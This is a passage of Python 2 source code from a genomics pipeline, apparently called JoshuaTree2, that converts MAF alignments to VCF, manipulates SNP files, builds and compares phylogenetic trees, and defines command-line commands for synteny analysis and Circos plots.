file=%s,\\
genotypes=(%s),\\
all=no,\\
reference=%s),\\"""%(vcf_file,','.join(self.species),self.reference_species))
def create_txt(self):
self.config_txt += """input.file=%s
input.format=%s
output.log=%s
maf.filter=\\\n"""%(self.input_file,self.input_format,self.log_file) +'\n'.join(self.endtxt[:-3])
with open(self.config_file,'w') as f:
f.write(self.config_txt)
def run_maffilter(self):
subprocess.call('./helper_scripts/maffilter param=%s'%self.config_file,shell=True)
class MAF:
def __init__(self, maf_file, special_format = True):
self.maf_file = maf_file
self.special_format = special_format
def merge(self, new_maf_file='merged.maf'):
if '*' in new_maf_file:
maf_files = glob.glob(self.maf_file)
else:
maf_files = self.maf_file.split(',')
subprocess.call('rm %s'%new_maf_file,shell=True)
subprocess.call("(echo '##maf version=1'; ( cat %s | sed -e '/Anc/d;/#/d' ) ;) > %s"%(' '.join(maf_files),new_maf_file),shell=True)
self.maf_file = new_maf_file
def index(self):
idxs = []
with open(self.maf_file,'r') as f:
offset = 0
for line in iter(f.readline, ''):
if line.startswith('a'):
idxs.append(offset)
offset = f.tell()
idxs.append(f.tell())
idxs = sorted(set(idxs))
self.idx = {idxs[i]:idxs[i+1] for i in range(len(idxs)-1)}
self.idxs = sorted(self.idx.keys())
def change_coordinates(self, reference_species,reference_species_chromosomes, changed_coordinates_file):
def change_segment(segment, ref_species, ref_species_chr):
aln_lines = segment.splitlines()
for i,line in enumerate(aln_lines):
if line.startswith('s'):
lineList = line.split()
orientation = lineList[4]
lineList2 = lineList[1].split('.')
lineList3 = lineList2[-1].split('_')[-2:]
lineList2[-1] = lineList2[-1].replace('_'+'_'.join(lineList3),'')
lineList[1] = '.'.join(lineList2[1:])
if lineList2[0] == ref_species:
chrom = lineList2[-1]
lineList[5] = str(ref_species_chr[chrom])
if orientation == '-':
lineList[2] = str(ref_species_chr[chrom]-int(lineList3[-1])+int(lineList[2]))#-int(lineList[3]))
else:
lineList[2] = str(int(lineList3[-2]) + int(lineList[2]))
position = int(lineList[2])
else:
lineList[2] = str(int(lineList3[-2]) + int(lineList[2]))
aln_lines[i] = '\t'.join(lineList)
try:
return chrom,position,'\n'.join(sorted(filter(None,aln_lines)))+'\n\n'
except:
return '', '', ''
chunks = [self.idxs[i:i+50000] for i in range(0,len(self.idxs),50000)]
with open(self.maf_file,'r') as f, open(changed_coordinates_file,'w') as f2:
for chunk in chunks:
out_segments = []
for idx in chunk:
f.seek(idx)
chrom, position, segment = change_segment(f.read(self.idx[idx] - idx),reference_species,reference_species_chromosomes)
if chrom:
out_segments.append(segment)
f2.write(''.join(out_segments))
self.maf_file_new_coords = changed_coordinates_file
def strand(self, reference_species):
subprocess.call('./helper_scripts/mafStrander -m %s --seq %s > temp.maf'%(self.maf_file,reference_species),shell=True)
subprocess.call('mv temp.maf %s'%self.maf_file)
def maf2vcf(self, maf_filter_config, species, reference_species, reference_species_fai, vcf_out, change_coordinates = True):
"""Run on a merged maf file first by using merger."""
reference_species_chromosomes = dict(zip(os.popen("awk '{print $1}' %s"%reference_species_fai).read().splitlines(),map(int,os.popen("awk '{print $2}' %s"%reference_species_fai).read().splitlines())))
try:
os.mkdir('vcfs')
except:
pass
self.strand(reference_species)
self.index()
if change_coordinates:
self.change_coordinates(reference_species,reference_species_chromosomes, self.maf_file.replace('.maf','.new_coords.maf'))
else:
self.maf_file_new_coords = self.maf_file
self.config = MAF_filter_config(maf_filter_config, self.maf_file_new_coords, species, reference_species)
self.config.add_subset_text(keep=False)
self.config.add_subset_text(species=reference_species)
self.config.add_vcf_text(vcf_out)
self.config.run_maffilter()
vcf_obj = SNP(vcf_out)
vcf_obj.concat_vcf(vcf_out)
vcf_obj.generate_new_header(vcf_out)
###################
#### SNP CLASS #### fixme vcf or tab file, as well as df, can local pca, local tree, final tree (run iqtree), visualize tree, produce enw vcf files and interact with other snp objects
# fixme maybe add nextflow class?
# fixme add test classes
class SNP:
def __init__(self, snp_file, snp_format = 'vcf'):
self.snp_file = snp_file
self.format = snp_format
if snp_format == 'tab':
self.tab = self.snp_file
print("Warning: Do not use vcf manipulation methods.")
def concat_vcf(self, vcf_out):
if self.format == 'vcf':
list_vcfs = self.snp_file.split(',')
master_df = pd.DataFrame()
header_lines = []
print list_vcfs
for vcf_in in list_vcfs:
with os.popen(('z' if vcf_in.endswith('.gz') else '')+'cat %s'%vcf_in) as f:
line_count = 0
for line in f:
header_lines.append(line)
if line.startswith('#CHROM'):
line_info = line.strip('/n').split() # FIXME can grab header line number here
break
line_count += 1
if vcf_in.endswith('.gz'):
master_df = master_df.append(pd.DataFrame(np.hstack([np.array(os.popen(('z' if vcf_in.endswith('.gz') else '')+"cat %s | grep -v ^# | awk '{ print $%d }'"%(vcf_in,i+1)).read().splitlines())[:,None] for i in range(len(line_info))]),columns = line_info))
else:
master_df = master_df.append(pd.read_table(vcf_in,header=line_count))
header_lines = set(header_lines)
master_df['POS'] = np.vectorize(int)(master_df['POS'])
master_df = master_df.sort_values(['#CHROM','POS'])
master_df.to_csv(vcf_out,sep='\t',index=False, na_rep = '.')
with open(vcf_out.replace('.vcf','.headers.vcf'),'w') as f, open(vcf_out,'r') as f2:
for line in [line2 for line2 in header_lines if '#CHROM' not in line2]:
f.write(line)
f.write(f2.read())
subprocess.call('mv %s %s'%(vcf_out.replace('.vcf','.headers.vcf'),vcf_out),shell=True)
self.snp_file = vcf_out
else:
print('File(s) must be in vcf/vcf.gz format before proceeding.')
def generate_new_header(self, vcf_out):
if self.format == 'vcf':
sort_vcf_in = self.snp_file
header_line = '\n'+os.popen("grep '^#CHROM' %s"%sort_vcf_in).read().strip('\n')
chrms = set(os.popen("awk '{ print $1}' %s | grep -v ^#"%sort_vcf_in).read().splitlines())
new_lines = """##fileformat=VCFv4.1\n"""+'\n'.join(sorted(['##contig=<ID=' + chrm + ',length=' + os.popen('grep %s %s | tail -n 1'%(chrm,sort_vcf_in)).read().strip('/n').split()[1] + '>' for chrm in chrms]))+'\n'+'\n'.join(['##FILTER=<ID=gap,Description="At least one sequence contains a gap">','##FILTER=<ID=unk,Description="At least one sequence contains an unresolved character">','##FILTER=<ID=gunk,Description="At least one sequence contains an unresolved character and gap.">','##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'])+header_line
with open('new_header.txt','w') as f:
f.write(new_lines+'\n')
subprocess.call("""(cat new_header.txt;
sed 's/gap,unk/gunk/g' %s | grep -v ^#;) \
> %s"""%(sort_vcf_in,sort_vcf_in.replace('.vcf','.new_head.vcf')),shell=True)
df = pd.read_table(sort_vcf_in.replace('.vcf','.new_head.vcf'),header=new_lines.count('\n')).fillna('.')
df['INFO'] = '.'
df['FORMAT'] = 'GT'
df.to_csv(sort_vcf_in.replace('.vcf','.new_head.vcf'),sep='\t',index=False, na_rep = '.')
subprocess.call("""(cat new_header.txt;
cat %s | grep -v ^#;) \
> %s"""%(sort_vcf_in.replace('.vcf','.new_head.vcf'),vcf_out),shell=True)# sort_vcf_in.replace('.vcf','.new_head_final.vcf')
self.snp_file = vcf_out
else:
print('File must be in vcf format before proceeding.')
def merge_vcf(self, vcf_out, excluded_species, reference_species, *list_vcf_obj):
#list_vcfs = list_vcfs.split(',')
list_vcfs = [vcf_obj.snp_file for vcf_obj in list_vcf_obj]
excluded_species = ','.join(excluded_species.split(',')+['%d:%s'%(i+2,reference_species) for i in range(len(list_vcfs) - 1)])
list_vcfs2 = []
for vcf in list_vcfs:
subprocess.call("(cat %s | grep ^# ; bedtools intersect -a %s -b %s ;) > %s"%(vcf,vcf,' '.join([v for v in list_vcfs if v != vcf]),vcf.replace('.vcf','.intersect.vcf')),shell=True)
vcf = vcf.replace('.vcf','.intersect.vcf')
subprocess.call('bcftools view %s -O z -o %s'%(vcf, vcf+'.gz'),shell=True)
subprocess.call('bcftools index %s.gz'%vcf,shell=True)
list_vcfs2.append(vcf)
subprocess.call('bcftools merge %s -O v --force-samples -o %s.gz'%(' '.join([vcf+'.gz' for vcf in list_vcfs2]), vcf_out),shell=True)
subprocess.call('bcftools view %s -O v -s ^%s -o %s'%(vcf_out+'.gz',excluded_species,vcf_out), shell=True)
return SNP(vcf_out)
def vcf2tab(self,tab_out):
subprocess.call("bcftools query -Hf '%%CHROM\\t%%POS\\t%%REF[\\t%%TGT]\\n' -o %s %s"%(tab_out,self.snp_file),shell=True)
self.tab = tab_out
def tab2fasta(self, fasta_out, sample = 0, tab_in = '', df = ''):
if tab_in:
self.tab = tab_in
if not list(df):
sample = sample
df = pd.read_table(self.tab,header=0)
if sample:
df = df.sample(n=sample)
with open(fasta_out,'w') as f:
for col in list(df)[3:]:
species = col[col.find(']')+1:col.rfind(':')]
f.write('>%s\n%s\n'%(species,''.join((df[col].as_matrix())).replace('.','-').replace('*','-')))
return fasta_aln(fasta_out)
def intersect_vcf(self, bed_regions, vcf_out):
subprocess.call('bedtools intersect -wa -a %s -b %s > %s'%(self.snp_file, bed_regions, vcf_out),shell=True)
return SNP(vcf_out)
def visualize_distribution(self, work_dir):
import seaborn as sns, matplotlib.pyplot as plt
work_dir += '/'
df = pd.read_table(self.snp_file,header=next(i for i,line in enumerate(open(self.snp_file,'r')) if line.startswith('#CHROM')))
for chrom in df['#CHROM'].unique():
dff = df[df['#CHROM'] == chrom]
plt.figure()
sns.distplot(dff['POS'].as_matrix())
plt.title(chrom + ' SNP distribution')
plt.savefig(work_dir+chrom+'_snp_distribution.png',dpi=300)
def erase_indels(self, vcf_out):
subprocess.call("vcftools --vcf %s --remove-indels --recode --recode-INFO-all --out %s"%(self.snp_file,vcf_out),shell=True)
return SNP(vcf_out)
def run_local_trees(self,snps_interval, phylogeny, work_dir):
vcf_file = os.path.abspath(self.snp_file)
tab_file = vcf_file.replace('.vcf','.tab')
work_dir = os.path.abspath(work_dir)+'/'
subprocess.call("export OPENBLAS_NUM_THREADS=1 && nextflow run local_trees.nf --vcf_file %s --tab_file %s --snps_interval %d --phylogeny %s --work_dir %s"%(vcf_file,tab_file,snps_interval,phylogeny,work_dir),shell=True)
def tab2chunks(self, tab_in, snp_intervals, write_file):
tab_df = pd.read_table(tab_in,header=0)
tab_df['[2]POS'] = tab_df['[2]POS'].as_matrix().astype(np.int)
tab_df = tab_df.sort_values(['# [1]CHROM','[2]POS'])
subprocess.call('rm %s'%write_file,shell=True)
for index, df in tab_df.groupby(np.arange(len(tab_df))//snp_intervals):
chroms = set(df['# [1]CHROM'])
if len(chroms) == 1:
interval_data = '_'.join([list(chroms)[0],str(np.min(df['[2]POS'])),str(np.max(df['[2]POS']))]) # fixme maybe try to do in parallel
self.tab2fasta('./%s.fa'%interval_data,0,'', df = df)
with open(write_file,'a') as f:
f.write('\t'.join([interval_data,os.path.abspath('./%s.fa'%interval_data)])+'\n')
class fasta_aln:
def __init__(self, fasta):
self.fasta = fasta
def to_snp(self, vcf_out ,fasta_out ,monomorphic):
subprocess.call('snp-sites -v%s -o %s %s'%('b' if int(monomorphic) else '',vcf_out,self.fasta),shell=True)
subprocess.call('snp-sites -m%s -o %s %s'%('b' if int(monomorphic) else '',fasta_out,self.fasta),shell=True)
return SNP(vcf_out), fasta_aln(fasta_out)
def generate_tree(self, phylogeny, tree_out = './out.treefile', model='MF',bootstrap=1, n_threads = 'AUTO'):
return_tree = 1
if phylogeny == 'iqtree':
iqtree_line = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/iqtree'
subprocess.call('rm %s.ckp.gz'%self.fasta,shell=True)
subprocess.call(iqtree_line + ' -s %s -m %s -nt %s %s'%(self.fasta,model,n_threads,'-b %d'%int(bootstrap) if int(bootstrap) > 1 else ''), shell=True) #GTR
shutil.copy(self.fasta+'.treefile',tree_out)
elif phylogeny == 'phyml':
phylip_in = self.fasta
if not phylip_in.endswith('.phylip'):#phylip_in.endswith('.fasta') or phylip_in.endswith('.fa'): #FIXME can add biopython conversion
#subprocess.call(['perl', fasta2phylip, phylip_in, phylip_in.replace('fasta','phylip').replace('fa','phylip')])
phylip_in = self.fasta.replace('fasta','phylip').replace('fa','phylip')
AlignIO.convert(self.fasta,'fasta',phylip_in,'phylip-relaxed')
phymlLine = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/phyml'
subprocess.call([phymlLine, '-i', phylip_in, '-s', 'BEST', '-q', '-b', bootstrap, '-m', 'GTR'])
if tree_out:
shutil.copy(phylip_in+'_phyml_tree.txt',tree_out)
elif phylogeny == 'fasttree':
fasttreeLine = next(path for path in sys.path if 'conda/' in path and '/lib/' in path).split('/lib/')[0]+'/bin/ete3_apps/bin/FastTree'
subprocess.call(fasttreeLine + ' -gtr -nt < ' + self.fasta + ' > ' + tree_out, shell=True)
else:
print('Please select different phylogenetic analysis tool [iqtree|phyml|fasttree].')
return_tree = 0
if return_tree:
return TreeObj(tree_out)
class TreeObj:
def __init__(self, treefile):
self.treefile = treefile
def reroot(self, root_species, tree_out):
t = PhyloTree(open(self.treefile,'r').read())
t.set_outgroup(root_species)
t.write(tree_out)
self.treefile = tree_out
def tree2matrix(self, distance_matrix = 'distance_matrix.csv'):
tree = Phylo.read(self.treefile,'newick')
allclades = list(tree.find_clades(order='level'))
species_names = [clade.name for clade in allclades if clade.name]
df = pd.DataFrame(np.nan, index=species_names, columns=species_names)
for i,j in combinations(species_names,r=2):
if i == j:
df.set_value(i,j,0)
if i != j:
distance = tree.distance(i,j)
df.set_value(i,j,distance)
df.set_value(j,i,distance)
df_keys = sorted(list(df))
df = df.reindex(index=df_keys,columns=df_keys)
df.to_csv(distance_matrix)
return df
def output_tree_image(self, fasta_obj, output_image):
if fasta_obj.fasta.endswith('.fasta') or fasta_obj.fasta.endswith('.fa'):
subprocess.call("awk '{ if ($0 !~ />/) {print toupper($0)} else {print $0} }' %s > aln.fasta"%fasta_obj.fasta,shell=True)
t = PhyloTree(self.treefile,alignment='aln.fasta',alg_format='fasta')
else:
t = Tree(self.treefile)
ts = TreeStyle()
ns = NodeStyle()
ns['size']=0
ts.show_leaf_name = True
ts.show_branch_length = False
ts.show_branch_support = True
for n in t.traverse():
n.set_style(ns)
t.render(output_image,tree_style = ts, dpi=300)
def write_trees_intervals(self, interval, out_file):
with open(self.treefile,'r') as f1, open(out_file,'w') as f2:
f2.write('\t'.join([interval,f1.read().strip('\n')]))
def local_trees2final_output(self,work_dir):
from collections import defaultdict
import seaborn as sns, matplotlib.pyplot as plt
from sklearn.manifold import MDS
import plotly.graph_objs as go
import plotly.offline as py
import dendropy
from dendropy.calculate import treecompare # ete3 calculates this distance as well
RFDistance = 1
work_dir += '/'
cluster_data = defaultdict(list)
tns = dendropy.TaxonNamespace()
for interval_data, tree in pd.read_table(self.treefile,header=None,dtype=str).as_matrix().tolist():
cluster_data[interval_data] = dendropy.Tree.get(data=tree,schema='newick',taxon_namespace=tns)
cluster_data[interval_data].encode_bipartitions()
cluster_keys = sorted(cluster_data.keys())
df = pd.DataFrame(np.nan, index=cluster_keys, columns=cluster_keys)
for i,j in list(combinations(cluster_keys,r=2)) + zip(cluster_keys,cluster_keys):
if i == j:
df.set_value(i,j,0)
if i != j:
if RFDistance:
dissimilarity = treecompare.weighted_robinson_foulds_distance(cluster_data[i], cluster_data[j])
else:
dissimilarity = np.linalg.norm(cluster_data[i]-cluster_data[j],None)
df.set_value(i,j,dissimilarity)
df.set_value(j,i,dissimilarity)
keys_df = pd.DataFrame(np.array([key.rsplit('_',2) for key in cluster_keys]))
keys_df[1] = keys_df[1].as_matrix().astype(np.int)
keys_df = keys_df.sort_values([0,1])
keys_df[1] = keys_df[1].as_matrix().astype(str)
new_keys = np.array(['_'.join(x) for x in keys_df.as_matrix()])
# FIXME sort by chromosome and position, integer... find a way, maybe feed to new dataframe and sort that way, break labels by _ and sort by [0,1] and not [2]
df = df.reindex(index=new_keys,columns=new_keys)
df.to_csv(work_dir+'dissimilarity_matrix_local_pca.csv')
if 0:
plt.figure()
sns.heatmap(df)
plt.savefig(work_dir+'dissimilarity_matrix_local_pca.png',dpi=300)
local_pca_dissimilarity = df.as_matrix()
local_pca_dissimilarity = np.nan_to_num(local_pca_dissimilarity)
mds = MDS(n_components=3,dissimilarity='precomputed')
transformed_data = mds.fit_transform(local_pca_dissimilarity)
np.save(work_dir+'local_pca_MDS_transform.npy',transformed_data)
pickle.dump(list(df.index.values),open(work_dir+'local_pca_window_names.p','wb'))
plots = []
plots.append(go.Scatter3d(x=transformed_data[:,0],y=transformed_data[:,1],z=transformed_data[:,2],text=list(df.index.values), mode='markers',marker=dict(color='blue', size=5),name='Regions'))
py.plot(go.Figure(data=plots),filename=work_dir+'Local_Topology_Differences.html',auto_open=False)
###################
#### CNS CLASS #### # fixme interface circos plots with CNS analysis, plot density of elements
#######################
#### RUN CLI GROUP ####
CONTEXT_SETTINGS = dict(help_option_names=['-h','--help'], max_content_width=90)
@click.group(context_settings= CONTEXT_SETTINGS)
@click.version_option(version='0.2')
def joshuatree():
pass
##################
#### COMMANDS ####
#####################
#### RUN SYNTENY ####
@joshuatree.command() #fixme can use a combo of unout and anchor files, or generate new anchor files after reach end of synteny file list, but there should be more
@click.option('-q', '--query_prot_id', default = 'all', show_default=True, help='Three number or letter proteome identifier of strain being compared against. If all selected, then synteny graph will be created by running pairwise comparisons between all species.')
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-s', '--synteny_path', default = './synteny_path/', show_default=True, help='Path containing synteny files, .unout or .anchors files. *.unout must conform to following pattern: [PAC4GC/PAC2_0].[q_protID]-[PAC4GC/PAC2_0].[s_protID]_5.unout; *.anchors must conform to: [q_protID].[s_protID].[*].anchors. Not neccessary to add files to this path, synteny will be generated if no specification.', type=click.Path(exists=False))
@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-bed', '--bed_path', default = './bed_path/', show_default=True, help='Bed path containing all of the bed files.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-fo', '--fasta_out_dir', default = './fasta_output/', show_default=True, help='Path containing all syntenic aligned regions, organized into fasta files for multiple sequence alignment via Cactus.', type=click.Path(exists=False))
@click.option('-bp', '--bps_threshold', default= 100000, show_default=True, help='Maximum distance from which to merge nearby syntenic regions of a particular genome.')
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-c', '--circos', is_flag=True, help='If selected, visualize each pairwise alignment using Circos.')
@click.option('-ci', '--circos_inputs', default = './circos_inputs/', show_default=True, help='Path containing all of circos inputs and configuration files.', type=click.Path(exists=False))
@click.option('-co', '--circos_outputs', default = './circos_outputs/', show_default=True, help='Path containing all of circos output images.', type=click.Path(exists=False))
def run_synteny_pipeline(query_prot_id,fasta_path,synteny_path,gff_path, bed_path, gene_info, fasta_out_dir, bps_threshold, loci_threshold, circos, circos_inputs, circos_outputs):
"""Stitch together many pairwise syntenic blocks into multiple species syntenic blocks and output as fasta files for a multiple sequence alignment. If synteny files are not supplied, conduct pairwise synteny between all included strains."""
query_protID = query_prot_id
fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
genomes = {}
pairwise_syntenies = []
for protID in intersect_keys:
genomes[protID] = Genome(fasta_files[protID],bed_path+'/'+protID+'.bed',protID,gff_files[protID],gene_info)
if circos:
genomes[protID].export_karyotype(circos_inputs+'/'+protID+'.karyotype.txt')
synteny_files = glob.glob(synteny_path+'/*.unout')+glob.glob(synteny_path+'/*.lifted.anchors')
synteny_protIDs, synteny_protIDs2 = [], []
remaining_protIDs, remaining_synteny = [], []
if synteny_files:
for synteny_file in synteny_files:
if synteny_file.endswith('.unout'):
coords = reduce(lambda x,y: x+y, sorted([[m.start(0),m.end(0)] for m in re.finditer('PAC2_0|PAC4GC',synteny_file)]))[1::2]
q_protID, s_prot_ID = map(lambda x: synteny_file[x+1:x+4],coords)
else:
q_protID, s_prot_ID = tuple(synteny_file[synteny_file.rfind('/')+1:].split('.')[:2])
if q_protID == query_protID or query_protID == 'all': # fixme for now... in future, implement -global option so all sequences can be included
synteny_protIDs.append((q_protID, s_prot_ID))
synteny_protIDs2.extend([(q_protID, s_prot_ID),(s_prot_ID, q_protID)])
pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],synteny_file,loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
pairwise_syntenies.append(pairwise_synteny)
if len(pairwise_syntenies) < len(intersect_keys)-1 and query_protID != 'all':
synteny_protIDs = set(np.array(synteny_protIDs)[:,1]).union({query_protID})
remaining_protIDs = set(intersect_keys) - synteny_protIDs
elif query_protID == 'all':
remaining_synteny = set(list(combinations(intersect_keys,r=2))) - set(synteny_protIDs)
else:
remaining_protIDs = set()
else:
if query_protID == 'all':
remaining_synteny = list(combinations(intersect_keys,r=2))
else:
remaining_protIDs = set(intersect_keys) - {query_protID}
if list(remaining_protIDs) or remaining_synteny:
def generate_CDS(protID):
print(protID)
genomes[protID].extract_CDS()
return protID
p = mp.ProcessingPool()
r = p.amap(generate_CDS,list(set(reduce(lambda x,y: list(x)+list(y),remaining_synteny))) if query_protID == 'all' else remaining_protIDs.union({query_protID}))
r.wait()
protIDs = r.get()
#for protID in remaining_protIDs.union({query_protID}):
# genomes[protID].extract_CDS()
def p_synteny(protIDs):
q_protID, s_prot_ID = protIDs
pairwise_synteny = PairwiseSynteny(genomes[q_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
return pairwise_synteny
r = p.amap(p_synteny,remaining_synteny if query_protID == 'all' else [(query_protID,s_prot_ID) for s_prot_ID in remaining_protIDs])#,callback=mycallback) # _async
r.wait()
pairwise_syntenies.extend(r.get())
p.close()
"""
for s_prot_ID in remaining_protIDs:
pairwise_synteny = PairwiseSynteny(genomes[query_protID],genomes[s_prot_ID],loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure(synteny_path)
pairwise_syntenies.append(pairwise_synteny)"""
if circos:
for pairwise_synteny in pairwise_syntenies:
pairwise_synteny.synteny_structure_2_link(circos_inputs+'/%s.%s.link.txt'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
circos_obj = Circos(pairwise_synteny)
circos_obj.generate_config(ticks = circos_inputs+'/txticks.conf', ideogram = circos_inputs+'/txideogram.conf', links_and_rules = circos_inputs+'/linksAndrules.conf', config=circos_inputs+'/circos.conf')
circos_obj.run_circos(circos_outputs+'/')
super_synteny = SuperSynteny(pairwise_syntenies, bps_threshold, genomes[query_protID])
super_synteny.generate_global_synteny_graph(fasta_out_dir)
@joshuatree.command()
@click.option('-f1', '--fasta_1', default = '1.fasta', show_default=True, help='Fasta file 1.', type=click.Path(exists=False))
@click.option('-f2', '--fasta_2', default = '2.fasta', show_default=True, help='Fasta file 2.', type=click.Path(exists=False))
@click.option('-g1', '--gff_1', default = '1.gff', show_default=True, help='GFF file 1.', type=click.Path(exists=False))
@click.option('-g2', '--gff_2', default = '2.gff', show_default=True, help='GFF file 2.', type=click.Path(exists=False))
@click.option('-link', '--link_file', default = '', show_default=True, help='Link file, either lifted anchors or unout.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
def extract_syntenic_blocks(fasta_1, fasta_2, gff_1, gff_2, link_file, gene_info, loci_threshold, work_dir):
"""Run pairwise circos in local directory."""
work_dir += '/'
genome1 = Genome(fasta_file=fasta_1, bed_file=work_dir+gff_1.split('.')[-2]+'.bed', protID=gff_1.split('.')[-2], gff_file=gff_1, gene_info=gene_info)
genome2 = Genome(fasta_file=fasta_2, bed_file=work_dir+gff_2.split('.')[-2]+'.bed', protID=gff_2.split('.')[-2], gff_file=gff_2, gene_info=gene_info)
if not link_file:
genome1.extract_CDS()
genome2.extract_CDS()
pairwise_synteny = PairwiseSynteny(genome1,genome2,link_file,loci_threshold=loci_threshold)
pairwise_synteny.generate_synteny_structure('./')
pairwise_synteny.synteny_structure_2_bed(work_dir+'/%s.%s.synteny.bed'%(pairwise_synteny.q_genome.protID,pairwise_synteny.s_genome.protID))
####################
#### RUN CIRCOS ####
@joshuatree.command()
@click.option('-fi', '--fasta_path', default = './fasta_path/', show_default=True, help='Fasta path containing all of the input genomes. Genome naming must conform to xxx_[protID]_xxx.[fa/fasta].', type=click.Path(exists=False))
@click.option('-gff', '--gff_path', default = './gff_path/', show_default=True, help='Gff path containing all of the gff/gff3 files. Gff naming must conform to: xxx.[protID].[gff/gff3].', type=click.Path(exists=False))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-n', '--n_chromosomes', default= 25, show_default=True, help='Number of chromosomes in synteny.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
@click.option('-v', '--variable_thickness', is_flag=True, help="Variable thickness for the links.")
@click.option('-t', '--thickness_factor', default=1000, show_default=True, help="If variable, thickness of link is length of link divided by factor.")
@click.option('-b', '--bundle_links', is_flag=True, help="Bundle closely spaced links.")
@click.option('-g', '--link_gap', default=10000, show_default=True, help="Gap between closely spaced links.")
def pairwise_circos_links(fasta_path,gff_path,loci_threshold,n_chromosomes,work_dir,variable_thickness,thickness_factor,bundle_links,link_gap):
fasta_files = {fasta.split('_')[-2] : fasta for fasta in glob.glob(fasta_path+'/*.fa')+glob.glob(fasta_path+'/*.fasta')}
gff_files = {gff.split('.')[-2] : gff for gff in glob.glob(gff_path+'/*.gff')+glob.glob(gff_path+'/*.gff3') }
intersect_keys = set(fasta_files.keys()) & set(gff_files.keys())
fasta_files = {protID:fasta for protID,fasta in fasta_files.items() if protID in intersect_keys}
gff_files = {protID:gff for protID,gff in gff_files.items() if protID in intersect_keys}
for p1,p2 in list(combinations(intersect_keys,r=2)):
opts={'-f1':fasta_files[p1],'-f2':fasta_files[p2],'-g1':gff_files[p1],'-g2':gff_files[p2],'-l':loci_threshold,'-n':n_chromosomes,'-w':work_dir,'-t':thickness_factor,'-g':link_gap}
if bundle_links:
opts['-b']=''
if variable_thickness:
opts['-v']=''
command='python JoshuaTree2.py pairwise_circos -o {0}'.format(' '.join('{0} {1}'.format(k,v) for k,v in opts.items()))
subprocess.call(command,shell=True)
@joshuatree.command()
@click.option('-f1', '--fasta_1', default = '1.fasta', show_default=True, help='Fasta file 1.', type=click.Path(exists=False))
@click.option('-f2', '--fasta_2', default = '2.fasta', show_default=True, help='Fasta file 2.', type=click.Path(exists=False))
@click.option('-g1', '--gff_1', default = '1.gff', show_default=True, help='GFF file 1.', type=click.Path(exists=False))
@click.option('-g2', '--gff_2', default = '2.gff', show_default=True, help='GFF file 2.', type=click.Path(exists=False))
@click.option('-link', '--link_file', default = '', show_default=True, help='Link file, either lifted anchors or unout.', type=click.Path(exists=False))
@click.option('-chr1', '--chrom_file1', default = '', show_default=True, help='File listing chromosomes in new order for species 1, can change names of all chromosomes via space delimiting in each line: old_chr_name new_chr_name.', type=click.Path(exists=False))
@click.option('-chr2', '--chrom_file2', default = '', show_default=True, help='File listing chromosomes in new order for species 2, can change names of all chromosomes via space delimiting in each line: old_chr_name new_chr_name.', type=click.Path(exists=False))
@click.option('-info', '--gene_info', default = 'Name', show_default=True, help='Naming convention for gff file\'s gene name field.', type=click.Choice(['Name', 'gene_name']))
@click.option('-l', '--loci_threshold', default= 4, show_default=True, help='Minimum number of genes in a syntenic block in order to include the block.')
@click.option('-n', '--n_chromosomes', default= 25, show_default=True, help='Number of chromosomes in synteny.')
@click.option('-w', '--work_dir', default = './', show_default=True, help='Working Directory.')
@click.option('-v', '--variable_thickness', is_flag=True, help="Variable thickness for the links.")
@click.option('-t', '--thickness_factor', default=1000, show_default=True, help="If variable, thickness of link is length of link divided by factor.")
@click.option('-b', '--bundle_links', is_flag=True, help="Bundle closely spaced links.")
@click.option('-g', '--link_gap', default=10000, show_default=True, help="Gap between closely spaced links.")
@click.option('-s', '--switch_lines', is_flag=True, help="Switch reference and query lines for circos production.")
@click.option('-o', '--no_output_circos', is_flag=True, help="No output circos.")
def pairwise_circos(fasta_1, fasta_2, gff_1, gff_2, link_file, chrom_file1, chrom_file2, gene_info, loci_threshold, n_chromosomes, work_dir, variable_thickness, thickness_factor, bundle_links, link_gap, switch_lines, no_output_circos):
"""Run pairwise circos in local directory."""
work_dir += '/'
genome1 = Genome(fasta_file=fasta_1, bed_file=work_dir+gff_1.split('.')[-2]+'.bed', protID=gff_1.split('.')[-2], gff_file=gff_1, gene_info=gene_info)
genome1.export_karyotype(work_dir+fasta_1[:fasta_1.rfind('.')]+'.karyotype.txt',n_chromosomes, chrom_file=chrom_file1)
